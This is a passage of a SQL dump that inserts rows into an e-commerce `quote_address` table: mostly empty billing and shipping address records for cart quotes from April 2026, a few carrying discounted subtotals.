(1927, 1147, '2026-04-25 01:24:49', '2026-04-25 01:24:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1928, 1147, '2026-04-25 01:24:49', '2026-04-25 01:24:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1929, 1148, '2026-04-25 04:06:52', '2026-04-25 04:06:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1930, 1148, '2026-04-25 04:06:52', '2026-04-25 04:06:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1931, 1149, '2026-04-25 10:33:35', '2026-04-25 10:33:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1932, 1149, '2026-04-25 10:33:35', '2026-04-25 10:33:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1933, 1150, '2026-04-25 12:28:12', '2026-04-25 12:28:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1934, 1150, '2026-04-25 12:28:12', '2026-04-25 12:28:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1935, 1151, '2026-04-25 19:51:24', '2026-04-25 19:51:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1936, 1151, '2026-04-25 19:51:24', '2026-04-25 19:51:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1937, 1152, '2026-04-25 20:58:35', '2026-04-25 20:58:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1938, 1152, '2026-04-25 20:58:35', '2026-04-25 20:58:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1939, 1153, '2026-04-26 05:08:19', '2026-04-26 05:08:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1940, 1153, '2026-04-26 05:08:19', '2026-04-26 05:08:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1941, 1154, '2026-04-26 05:18:20', '2026-04-26 05:18:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1942, 1154, '2026-04-26 05:18:20', '2026-04-26 05:18:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1943, 1155, '2026-04-26 13:36:07', '2026-04-26 13:36:07', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1944, 1155, '2026-04-26 13:36:07', '2026-04-26 13:36:07', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1945, 1156, '2026-04-26 14:20:56', '2026-04-26 14:20:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1946, 1156, '2026-04-26 14:20:56', '2026-04-26 14:20:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1947, 1157, '2026-04-26 14:27:35', '2026-04-26 14:27:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1948, 1157, '2026-04-26 14:27:35', '2026-04-26 14:27:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1949, 1158, '2026-04-26 14:50:04', '2026-04-26 14:50:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1950, 1158, '2026-04-26 14:50:04', '2026-04-26 14:50:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1951, 1159, '2026-04-26 22:00:16', '2026-04-26 22:00:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1952, 1159, '2026-04-26 22:00:16', '2026-04-26 22:00:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1953, 1160, '2026-04-26 23:40:27', '2026-04-26 23:40:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1954, 1160, '2026-04-26 23:40:27', '2026-04-26 23:40:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1955, 1161, '2026-04-27 03:21:02', '2026-04-27 03:21:02', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1956, 1161, '2026-04-27 03:21:02', '2026-04-27 03:21:02', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1957, 1162, '2026-04-27 03:21:05', '2026-04-27 03:21:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1958, 1162, '2026-04-27 03:21:05', '2026-04-27 03:21:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(1959, 1163, '2026-04-27 03:21:27', '2026-04-27 03:21:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1960, 1163, '2026-04-27 03:21:28', '2026-04-27 03:21:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1961, 1164, '2026-04-27 03:21:40', '2026-04-27 03:21:40', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1962, 1164, '2026-04-27 03:21:40', '2026-04-27 03:21:40', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1963, 1165, '2026-04-27 03:22:00', '2026-04-27 03:22:00', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1964, 1165, '2026-04-27 03:22:00', '2026-04-27 03:22:00', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1965, 1166, '2026-04-27 03:22:02', '2026-04-27 03:22:02', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1966, 1166, '2026-04-27 03:22:02', '2026-04-27 03:22:02', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1967, 1167, '2026-04-27 03:22:24', '2026-04-27 03:22:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1968, 1167, '2026-04-27 03:22:24', '2026-04-27 03:22:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1969, 1168, '2026-04-27 06:20:47', '2026-04-27 06:20:47', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1970, 1168, '2026-04-27 06:20:47', '2026-04-27 06:20:47', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
